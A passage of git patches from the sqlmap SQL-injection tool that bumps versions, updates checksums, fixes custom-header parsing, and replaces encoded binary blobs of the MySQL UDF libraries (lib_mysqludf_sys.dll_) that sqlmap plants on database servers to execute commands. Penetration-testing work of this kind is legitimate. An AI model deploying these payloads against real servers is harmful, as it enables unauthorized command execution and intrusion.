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 D+}K`! From 93b425809e09e1780a4441f30b9e7cb6ec014a90 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 7 Mar 2018 16:04:35 +0100 Subject: [PATCH 052/428] With latest NULL checks (Issue #2965) --- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- udf/mysql/windows/32/lib_mysqludf_sys.dll_ | Bin 4477 -> 4549 bytes 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index f273f963504..8c825fe9699 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.6" +VERSION = "1.2.3.7" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index d5e7df371a3..ec8d900f635 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -bcc364e787f34f4c3e65eb464ab6f8d6 lib/core/settings.py +d156fefe5e6217850cae76325485f992 lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 3cc852f927833895361973fbcfd156d2 lib/core/target.py @@ -364,7 +364,7 @@ a44e7cf30f2189b2fbdb635b310cdc0c thirdparty/wininetpton/win_inet_pton.py 593473084228b63a12318d812e50f1e2 thirdparty/xdot/xdot.py 08c706478fad0acba049d0e32cbb6411 udf/mysql/linux/32/lib_mysqludf_sys.so_ 1501fa7150239b18acc0f4a9db2ebc0d udf/mysql/linux/64/lib_mysqludf_sys.so_ -ada861971f716ee1307b30e7de711b29 udf/mysql/windows/32/lib_mysqludf_sys.dll_ +70d83edb90c4a20bd95eb62f71c99bd0 udf/mysql/windows/32/lib_mysqludf_sys.dll_ 7fed5b8e99e36ce255c64527ec61a995 udf/mysql/windows/64/lib_mysqludf_sys.dll_ 0ee1310d4e2a4cc5a7295df01a3a78bf udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_ c7d9e1fcac5f047edf17d79a825fb64b udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_ diff --git a/udf/mysql/windows/32/lib_mysqludf_sys.dll_ b/udf/mysql/windows/32/lib_mysqludf_sys.dll_ index 9ad5063483a67ff509d63dd7ed18cd7f78e55596..22a11422050bc54ec4916b2ffbb2382f00840a4a 100644 GIT binary patch literal 4549 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 literal 4477 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 Pzx$g0m$(0Z=M1pG<72!& From 881b49afd2d76865e45530dc0d53f313baa1af4d Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 8 Mar 2018 01:21:34 +0100 Subject: [PATCH 053/428] Fixes #2969 --- lib/core/agent.py | 2 +- lib/core/settings.py | 2 +- lib/request/connect.py | 4 ++-- txt/checksum.md5 | 6 +++--- 4 files changed, 7 insertions(+), 7 deletions(-) diff --git a/lib/core/agent.py b/lib/core/agent.py index ac41aadc201..e8422bcc3e1 100644 --- a/lib/core/agent.py +++ b/lib/core/agent.py @@ -121,8 +121,8 @@ def payload(self, place=None, parameter=None, value=None, newValue=None, where=N origValue = _.split('=', 1)[1] if '=' in _ else "" elif place == PLACE.CUSTOM_HEADER: paramString = origValue - origValue = origValue.split(kb.customInjectionMark)[0] origValue = origValue[origValue.find(',') + 1:] + origValue = origValue.split(kb.customInjectionMark)[0] match = re.search(r"([^;]+)=(?P[^;]*);?\Z", origValue) if match: origValue = match.group("value") diff --git a/lib/core/settings.py b/lib/core/settings.py index 8c825fe9699..24ceecfdf19 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.7" +VERSION = "1.2.3.8" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/request/connect.py b/lib/request/connect.py index 19049bf31a7..1a176f19ae4 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -933,9 +933,9 @@ def queryPage(value=None, place=None, content=False, getRatioValue=False, silent if value and place == PLACE.CUSTOM_HEADER: if value.split(',')[0].capitalize() == PLACE.COOKIE: - cookie = value.split(',', 1)[1] + cookie = value.split(',', 1)[-1] else: - auxHeaders[value.split(',')[0]] = value.split(',', 1)[1] + auxHeaders[value.split(',')[0]] = value.split(',', 1)[-1] if conf.csrfToken: def _adjustParameter(paramString, parameter, newValue): diff --git a/txt/checksum.md5 b/txt/checksum.md5 index ec8d900f635..2f8304999e8 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -25,7 +25,7 @@ a4605691d340fd05d4bfe7dde922da92 lib/controller/checks.py 9fbd66da9b5cf58bbb8474ccf9252bb7 lib/controller/controller.py a7b0c8e5a18a3abe8803999dcfc4664f lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py -e3a3f5218b2e52dd0afafdfc9fed2002 lib/core/agent.py +052c368ae6ca09362a19376c8483fa85 lib/core/agent.py 86a4703d5474badd8462146510b2c460 lib/core/bigarray.py 863d9c00a7684db29005705d6dcc36b9 lib/core/common.py 2a40d5b5997265daa890545d4a4a59b9 lib/core/convert.py @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -d156fefe5e6217850cae76325485f992 lib/core/settings.py +22b96798d429186f0f273b3e2b399289 lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 3cc852f927833895361973fbcfd156d2 lib/core/target.py @@ -68,7 +68,7 @@ fb2e2f05dde98caeac6ccf3e67192177 lib/parse/configfile.py 4e60fe7c94bbfa631087ed3426df8ef0 lib/request/basicauthhandler.py eb39d5cbd69a2238e2f4ea2fde183cdb lib/request/basic.py c0cabedead14b8a23353b606672cff42 lib/request/comparison.py -6b70d287ed2508ffc66b37994d5ffca5 lib/request/connect.py +f6a31eaa50907b724c25ead5a6fe7161 lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py a1436e4e4f9b636cb8332f00b686bfd5 lib/request/httpshandler.py From 43044d8512f3382223bfd81eb09d1c4a10c4b139 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 8 Mar 2018 13:33:49 +0100 Subject: [PATCH 054/428] Added new compiled 64-bit version (Issue #2965) --- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- udf/mysql/windows/64/lib_mysqludf_sys.dll_ | Bin 4773 -> 5267 bytes 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 24ceecfdf19..09f5243002f 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.8" +VERSION = "1.2.3.9" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 2f8304999e8..db964e74135 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -22b96798d429186f0f273b3e2b399289 lib/core/settings.py +bcacc60d5d1a2769a667e787eb08b625 lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 3cc852f927833895361973fbcfd156d2 lib/core/target.py @@ -365,7 +365,7 @@ a44e7cf30f2189b2fbdb635b310cdc0c thirdparty/wininetpton/win_inet_pton.py 08c706478fad0acba049d0e32cbb6411 udf/mysql/linux/32/lib_mysqludf_sys.so_ 1501fa7150239b18acc0f4a9db2ebc0d udf/mysql/linux/64/lib_mysqludf_sys.so_ 70d83edb90c4a20bd95eb62f71c99bd0 udf/mysql/windows/32/lib_mysqludf_sys.dll_ -7fed5b8e99e36ce255c64527ec61a995 udf/mysql/windows/64/lib_mysqludf_sys.dll_ +15aaa93872ca87366065568375ad8eb1 udf/mysql/windows/64/lib_mysqludf_sys.dll_ 0ee1310d4e2a4cc5a7295df01a3a78bf udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_ c7d9e1fcac5f047edf17d79a825fb64b udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_ ec41a080f4570c3866b9a7219f7623c4 udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_ diff --git a/udf/mysql/windows/64/lib_mysqludf_sys.dll_ b/udf/mysql/windows/64/lib_mysqludf_sys.dll_ index c06f77f2294b196b64954a561f14935dfa88c7ed..3641746f11aaf054c89b24c310f213b2a13b6761 100644 GIT binary patch literal 5267 zcmV;E6m07Uob5*jCoBlIzncPHTda1ndUKm~gr&$;J84jDYHCx8bzXL7%^3}REu=qu zH8UJmF=9j!s1ltPt$a~m;(Z-HC8=p7I(&kb39x>|+Jamc=6TSuG2i#z``!fK_x_mQ zmkiGV?z!jw5$?Gd$(mJwdVk`dnWF;c#VTz-(>KJ-(c0(4`_aXF*vmhe>ZvHB-eP) z&DuABq{0RKIAN$Wc*uw2H=W7qQOZ8XLDq+zcsv5wy8`KQ_#(MY?X!7dl_Yevc}TY* zdY5CaDF~cWe4(32RWm4Jc%kQunW#dAGb 